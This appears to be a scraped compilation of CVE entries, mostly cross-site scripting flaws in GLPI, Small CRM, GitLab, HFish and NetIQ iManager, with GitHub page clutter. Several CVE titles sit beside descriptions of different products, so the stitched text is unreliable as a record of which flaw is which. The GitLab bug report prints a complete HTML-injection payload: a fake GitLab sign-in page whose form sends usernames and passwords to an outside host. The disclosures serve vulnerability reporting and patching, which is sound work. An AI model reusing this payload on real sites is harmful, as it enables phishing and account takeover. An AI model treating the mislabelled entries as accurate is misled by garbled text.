GLPI is a Free Asset and IT Management Software package. Versions 0.6.0 and above, prior to 10.0.6 are vulnerable to Cross-site Scripting. This vulnerability allow for an administrator to create a malicious external link. This issue is patched in 10.0.6.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-22725: XSS on external links

A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.

**\# Exploit Title: Small CRM — Stored Cross-Site Scripting Vulnerability.  
\# Date: 12-Nov-2022  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:** **https://phpgurukul.com/****\# Software Link:** **https://phpgurukul.com/small-crm-php/****\# Version: 3.0  
\# Tested on: Windows 10  
\# Contact:** **https://www.linkedin.com/in/shivakumar-m-v/**

Stored XSS Vulnerability : Cross-site scripting attacks, also called XSS attacks, are a type of injection attack that injects malicious code into specific input fields. If the inputs fields are not validating or not sanitizing the user input then attacker can run malicious script that runs at server side.

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

**Attack vector:  
**This vulnerability can results attacker injecting the XSS payload in the Subject input Field in “Create Ticket” page and each time user visits the “View Ticket” page, the XSS triggers and the attacker can able to steal the cookie according to the crafted payload.

**Vulnerable Parameter:** Subject.

The Reproducive Steps are given in Video PoC.

**Impact:**

XSS may results to Cookie Stealing, Session Hijacking, Redirection, Account Takeovers and many malicious activities will be performed by perpetrators.

**Mitigations:**

01) Implement Web Application Firewall

02) Configure Security Headers that will validate user input and allow the request.

03) Encode user input wherever possible.

CVE-2022-47073: Stored XSS found in Small CRM (phpgurukul) - Shiva Kumar M V - Medium

GLPI is a Free Asset and IT Management Software package. Versions prior to 10.0.6 are subject to Cross-site Scripting via malicious RSS feeds. An Administrator can import a malicious RSS feed that contains Cross Site Scripting (XSS) payloads inside RSS links. Victims who wish to visit an RSS content and click on the link will execute the Javascript. This issue is patched in 10.0.6.

Moderate

trasher published GHSA-x9g4-j85w-cmff

Jan 24, 2023

**Package**

glpi (glpi-project)

**Affected versions**

\>= 10.0.0

**Description**

**Impact**

RSS feeds contents and links are not properly sanitized. Any user that has subscribed to a malicious RSS feed through its personal or through public RSS feeds can be victim of a XSS attack.

**Patches**

Upgrade to 10.0.6

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

**CVSS base metrics**

User interaction

Required

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

**Weaknesses**

**Credits**

CVE-2023-22724: XSS in RSS Description Link

GLPI is a Free Asset and IT Management Software package. Versions 9.4.0 and above, prior to 10.0.6 are subject to Cross-site Scripting. An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate session cookies. This issue is patched in version 10.0.6.

Moderate

trasher published GHSA-352j-wr38-493c

Jan 24, 2023

**Package**

glpi (glpi-project)

**Affected versions**

\>= 9.4.0

**Patched versions**

9.5.12, 10.0.6

**Description**

**Impact**

An attacker can persuade a victim into opening a URL containing a payload exploiting a vulnerability on browse views.

**Patches**

Upgrade to 10.0.6

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

**CVSS base metrics**

User interaction

Required

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N

**Weaknesses**

CVE-2023-22722: XSS on browse views

An issue has been discovered in GitLab EE affecting all versions starting from 15.6 before 15.6.1. It was possible to create a malicious README page due to improper neutralisation of user supplied input.

Skip to content

Open Issue created Nov 21, 2022 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**HTML content injection in README file**

**HackerOne report #1777934** by yvvdwf on 2022-11-18, assigned to @nmalcolm:

Report | How To Reproduce

**Report**

Hi,

**Summary**

Gitlab recently changed the way to render plain text file

    ###  https://gitlab.com/gitlab-org/gitlab/-/blob/053729ecfd3d2b3d2e0ce3618b35cb3c46472897/app/services/markup/rendering_service.rb#L66  
        def plain_unsafe  
          "<pre class=\"plain-readme\">#{text}</pre>"  
        end  

This allows to inject any HTML content. Although the content is then sanitized by Dumpurify via v-safe-html directly. The sanitization allows <form> tag, thus this can be used to popup a login form. If users enter their credential, then their account will be taken over.

I submit this report when considering the ease of exploitation and its impact (although the HTML content injection does not lead to any kind of XSS). Because the content of README file is loaded by default in the main view of a project, attackers may easily trick users to fill their credential in the dummy login form, for example.

**Steps to reproduce**

*   in an existing project or create a new one
*   add a file naming README (please note that no extension here, README.md does not work) with the following content:

    </pre>
    
    <div class="flash-container flash-container-page sticky" data-qa-selector="flash_container">  
       <div class="gl-alert flash-notice gl-alert-info" data-testid="alert-info" role="alert">  
          <svg class="s16 gl-alert-icon gl-alert-icon-no-title" data-testid="information-o-icon"><use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#information-o"></use></svg>  
          <button aria-label="Dismiss" class="btn gl-dismiss-btn btn-default btn-sm gl-button btn-default-tertiary btn-icon js-close" type="button">  
             <svg class="s16" data-testid="close-icon"><use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#close"></use></svg>  
          </button>  
          <div class="gl-alert-content" role="alert">  
             <div class="gl-alert-body">  
                Loading content ...  
             </div>  
          </div>  
       </div>  
    </div>
    
    <style>[@]keyframes fadeIn {99% {visibility: hidden;} 100% { visibility: visible;}</style>
    
    
    <div style="position:fixed!important;top:0px;left:0px;right:0px;bottom:0px;background-color:white;z-index:9999; animation: 3s fadeIn; animation-fill-mode: forwards;visibility: hidden;">  
    <div style="position:fixed!important;top:0px;left:0px;right:0px;bottom:0px;background-color:var(--gray-50)">  
    <div class="page-wrap borderless">  
       <div class="login-page-broadcast">  
       </div>  
       <div class="container navless-container">  
          <div class="content">  
             <div class="flash-container flash-container-page sticky" data-qa-selector="flash_container">  
                <div class="gl-alert flash-alert gl-alert-danger" data-testid="alert-danger" role="alert">  
                   <svg class="s16 gl-alert-icon gl-alert-icon-no-title" data-testid="error-icon">  
                      <use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#error"></use>  
                   </svg>  
                   <button aria-label="Dismiss" class="btn gl-dismiss-btn btn-default btn-sm gl-button btn-default-tertiary btn-icon js-close" type="button">  
                      <svg class="s16" data-testid="close-icon">  
                         <use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#close"></use>  
                      </svg>  
                   </button>  
                   <div class="gl-alert-content" role="alert">  
                      <div class="gl-alert-body">  
                         You need to sign in or sign up before continuing.  
                      </div>  
                   </div>  
                </div>  
             </div>  
             <div class="mt-3">  
                <div class="col-sm-12 gl-text-center">  
                   <img alt="GitLab.com" class="gl-w-10 js-lazy-loaded" src="https://gitlab.com/assets/logo-911de323fa0def29aaf817fca33916653fc92f3ff31647ac41d2c39bbe243edb.svg" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                   <h1 class="mb-3 gl-font-size-h2">  
                      GitLab.com  
                   </h1>  
                </div>  
             </div>  
             <div class="mb-3">  
                <div class="gl-w-half gl-xs-w-full gl-ml-auto gl-mr-auto bar">  
                   <div id="signin-container">  
                      <div class="tab-content">  
                         <div class="login-box tab-pane active" id="login-pane" role="tabpanel">  
                            <div class="login-body">  
                               <form class="new_user gl-show-field-errors js-arkose-labs-form" id="new_user" aria-live="assertive" data-testid="sign-in-form" action="https://yvvdwf.me/gl" accept-charset="UTF-8" method="post">  
                                  <input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                                  <div class="form-group gl-px-5 gl-pt-5">  
                                     <label for="user_login" class="label-bold gl-mb-1">Username or email</label>  
                                     <input class="form-control gl-form-input top js-username-field" autofocus="autofocus" autocapitalize="off" autocorrect="off" required="required" title="This field is required." data-qa-selector="login_field" data-testid="username-field" type="text" name="user[login]" id="user_login">  
                                     <p class="gl-field-error hidden">This field is required.</p>  
                                  </div>  
                                  <div class="form-group gl-px-5">  
                                     <label class="label-bold gl-mb-1" for="user_password">Password</label>  
                                     <input class="form-control gl-form-input bottom" autocomplete="current-password" required="required" title="This field is required." data-qa-selector="password_field" data-testid="password-field" type="password" name="user[password]" id="user_password">  
                                     <p class="gl-field-error hidden">This field is required.</p>  
                                  </div>  
                                  <div class="gl-px-5">  
                                     <div class="gl-display-inline-block">  
                                        <div class="gl-form-checkbox custom-control custom-checkbox">  
                                           <input name="user[remember_me]" type="hidden" value="0" autocomplete="off"><input class="custom-control-input" type="checkbox" value="1" name="user[remember_me]" id="user_remember_me">  
                                           <label class="custom-control-label" for="user_remember_me"><span>Remember me</span></label>  
                                        </div>  
                                     </div>  
                                     <div class="gl-float-right">  
                                        <a href="/users/password/new">Forgot your password?</a>  
                                     </div>  
                                  </div>  
                                  <div></div>  
                                  <div>  
                                          
                                     <div data-testid="arkose-labs-challenge" class="gl-display-flex gl-justify-content-center gl-mt-3 gl-mb-n3 js-arkose-labs-container-1" style="display: none;"></div>  
                                       
                                  </div>  
                                  <div class="submit-container move-submit-down gl-px-5">  
                                     <button name="button" type="submit" class="gl-button btn btn-block btn-confirm js-sign-in-button js-no-auto-disable" data-qa-selector="sign_in_button" data-testid="sign-in-button">Sign in</button>  
                                  </div>  
                               </form>  
                            </div>  
                         </div>  
                      </div>  
                      <p class="gl-px-5">  
                         By signing in you accept the <a href="/-/users/terms" target="_blank" rel="noreferrer noopener">Terms of Use and acknowledge the Privacy Policy and Cookie Policy</a>.  
                      </p>  
                      <p class="gl-mt-3 gl-text-center">  
                         Don't have an account yet?  
                         <a data-qa-selector="register_link" href="/users/sign_up">Register now</a>  
                      </p>  
                      <div class="clearfix">  
                         <div class="omniauth-container gl-mt-5 gl-p-5 gl-text-center gl-w-90p gl-ml-auto gl-mr-auto">  
                            <label class="gl-font-weight-normal">  
                            Sign in with  
                            </label>  
                            <div class="gl-display-flex gl-flex-wrap gl-justify-content-center">  
                               <form class="gl-mb-3" method="post" action="/users/auth/google_oauth2"><button id="oauth-login-google_oauth2" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Google" title="Sign in with Google" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/google_64-9ab7462cd2115e11f80171018d8c39bd493fc375e83202fbb6d37a487ad01908.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Google  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/github"><button id="oauth-login-github" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="GitHub" title="Sign in with GitHub" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/github_64-84041cd0ea392220da96f0fb9b9473c08485c4924b98c776be1bd33b0daab8c0.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  GitHub  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/twitter"><button id="oauth-login-twitter" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Twitter" title="Sign in with Twitter" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/twitter_64-22f28114e53ba8324a944fc07b5a5739a78d2a4083d07c0ea2fec2bc1ebfc49d.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Twitter  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/bitbucket"><button id="oauth-login-bitbucket" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Bitbucket" title="Sign in with Bitbucket" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/bitbucket_64-daa496030c0c290748e3c2e50f7464d2f5de0e019cce728930e0508a6dac815c.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Bitbucket  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/salesforce"><button id="oauth-login-salesforce" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Salesforce" title="Sign in with Salesforce" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/salesforce_64-0fb2c008b7c8d627aadda7ec593509e0bd402752df28d8a17b04ac1a30c26ef9.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Salesforce  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                            </div>  
                            <div class="gl-form-checkbox custom-control custom-checkbox">  
                               <input type="checkbox" name="remember_me" id="remember_me" class="custom-control-input">  
                               <label class="custom-control-label" for="remember_me"><span>Remember me  
                               </span></label>  
                            </div>  
                         </div>  
                      </div>  
                   </div>  
                </div>  
             </div>  
          </div>  
       </div>  
       <hr class="footer-fixed">  
       <div class="container footer-container">  
          <div class="footer-links">  
             <a href="/explore">Explore</a>  
             <a href="/help">Help</a>  
             <a href="https://about.gitlab.com">About GitLab</a>  
             <a target="_blank" class="text-nowrap" rel="noopener noreferrer" href="https://forum.gitlab.com">Community forum</a>  
          </div>  
       </div>  
    </div>  

*   save the file, then back to the main page of the project
*   you should see a login popup that appears after 3 seconds which is adjustable.
*   if the form is submited, its target is outside gitlab.com, e.g., https://yvvdwf.me/gl, then the username/password will be leaked

**Impact**

A risk to leak username and password of victims

**Examples**

https://gitlab.com/yvvdwf/dummy-login

**What is the current _bug_ behavior?**

HTML tag in a plain text is not escaped

**What is the expected _correct_ behavior?**

HTML tag in a plain text should be escaped

**Output of checks**

This bug happens on GitLab.com

**Impact**

A risk to leak username and password of victim

**How To Reproduce**

Please add reproducibility information to this section:

**Video**

html-injection

Edited Nov 21, 2022 by Nick Malcolm

CVE-2022-4092: HTML content injection in README file (#383208) · Issues · GitLab.org / GitLab · GitLab

A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2022-45730: CVE/CVE-2022-45730 at main · Rajeshwar40/CVE

GLPI is a Free Asset and IT Management Software package. Versions 10.0.0 and above, prior to 10.0.6, are subject to Cross-site Scripting. An administrator may store malicious code in help links. This issue is patched in 10.0.6.

CVE-2022-41941: XSS Stored inside Standard Interface Help Link href attribute

An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.

CVE-2022-38775: Security issues

An issue was discovered in HFish 0.5.1. When a payload is inserted where the name is entered, XSS code is triggered when the administrator views the information.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-22327: the client name can XSS · Issue #61 · hacklcx/HFish

Cross-site Scripting (XSS) vulnerability in NetIQ iManager prior to version 3.2.6 allows attacker to execute malicious scripts on the user's browser. This issue affects: Micro Focus NetIQ iManager NetIQ iManager versions prior to 3.2.6 on ALL.

February 2022

NetIQ iManager 3.2 SP6 resolves previous issues. Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure our products meet all your needs. You can post feedback in the iManager Community Support Forums, our community Web site that also includes product notifications, blogs, and product user groups.

For a full list of all issues resolved in NetIQ iManager 3.x, including all patches and service packs, refer to TID 7016795, “History of Issues Resolved in NetIQ iManager 3.x”.

For more information about this release and for the latest release notes, see the iManager Documentation Web site. To download this product, see the Software License and Download portal.

*   What’s New
    
*   System Requirements
    
*   Installing or Upgrading
    
*   Known Issues
    
*   Legal Notice
    

**1.0 What’s New**

iManager 3.2 SP6 provides the following enhancements and fixes in this release:

*   Operating System Support
    
*   Updates for Dependent Components
    
*   Fixed Issues
    

**1.1 Operating System Support**

In addition to the platforms supported in previous releases of iManager, this release adds support for the following:

*   Red Hat Enterprise Linux (RHEL) 8.5
    
*   Windows Server 2022
    

**1.2 Updates for Dependent Components**

This release adds support for the following third-party components:

*   Azul Zulu 1.8.0\_312
    
*   Apache Tomcat 9.0.55-1
    
*   OpenSSL 1.0.2za
    
*   Log4j 2.17.1
    

**1.3 Fixed Issues**

This release includes the following software fixes that resolve several previous issues:

**Resolved Security Vulnerabilities**

This version of iManager resolves security vulnerability CVE-2021-38134. Special thanks to Kajetan Rostojek for responsibly disclosing the information about CVE-2022-38758 to us.

**Occasional Delay When Loading Pages on the iManager User Interface After Upgrading to iManager 3.2.5**

_Fix:_ With the latest version of Tomcat 9.0.55-1 bundled with iManager 3.2.6, there is no longer any delay while loading the pages on the iManager User Interface.(Defect 440043)

**Connection Timeout Issue Seen When Modifying Directory Objects or Using Plug-Ins**

_Fix:_ With the latest version of Tomcat 9.0.55-1 bundled with iManager 3.2.6, there is no longer any delay while navigating the pages or browsing objects on the iManager User Interface. (Defect 448035)

**2.0 System Requirements**

For information about prerequisites, computer requirements, installation, upgrade or migration, see Planning to Install iManager in the NetIQ iManager Installation Guide.

_NOTE:_iManager uses the modified version of XULRunner on Windows. The source code for the modified XULRunner is available under the Mozilla Public License version 2.0. If you need further assistance with any issue, contact Technical Support.

**3.0 Installing or Upgrading**

To upgrade to iManager 3.2 SP6, you need to be on iManager 2.7.7 P11 or higher.

For more information on upgrading to iManager 3.2 SP6, see the NetIQ iManager Installation Guide.

IMPORTANT:

*   This version of iManager supports only eDirectory 9.2.6 or above when both are installed on the same machine. If you are upgrading iManager 2.7.7 P11 to 3.2 SP6, ensure that your eDirectory is also upgraded to 9.2.6 before upgrading iManager.
    
*   When you install or upgrade to iManager 3.2 SP6, a new imanager\_logging.xml file is created that includes the latest log4j 2.17.1 capabilities. During the upgrade process, the existing imanager\_logging.xml file is replaced with a new one. As a result, the previous audit settings are lost. To allow auditing for iManager events, you must configure the audit settings again in the new imanager\_logging.xml file after the upgrade. Make sure to take a backup of the existing file in a different location before performing the upgrade. For more information, see Auditing iManager Events in the NetIQ iManager Administration Guide.
    

**4.0 Known Issues**

NetIQ Corporation strives to ensure our products provide quality solutions for your enterprise software needs. There are no new issues other than the issues mentioned in the NetIQ iManager 3.2 SP5 Release Notes. If you need further assistance with any issue, please contact Technical Support.

**4.1 iManager Workstation Does Not Work on SLED 12 SP3, SLED 15, OpenSUSE Leap 42.3, OpenSUSE 13.2, and Onward**

_Workaround:_ To workaround this issue, launch iManager using the iManager.sh command and access the workstation through another browser via the URL: http://localhost:8080/nps. The port number can differ. You can find the port number in the iManager.log file located at <extracted\_directory>/imanager/bin/iManager.log location.

**5.0 Legal Notice**

For information about legal notices, trademarks, disclaimers, warranties, export and other use restrictions, U.S. Government rights, patent policy, and FIPS compliance, see https://www.netiq.com/company/legal/.

Copyright © 2022 NetIQ Corporation, a Micro Focus company. All Rights Reserved.

Tag

#xss